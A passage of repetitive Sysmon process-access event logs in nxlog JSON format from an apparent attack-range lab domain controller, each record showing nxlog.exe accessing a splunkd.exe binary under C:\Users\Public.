(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:29.497","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4449,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:30.497\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:30.497","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4450,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:31.497\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:31.497","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4451,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:32.498\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:32.498","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4452,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:33.498\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:33.498","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4453,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:34.498\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:34.498","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4454,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:35.499\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:35.499","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
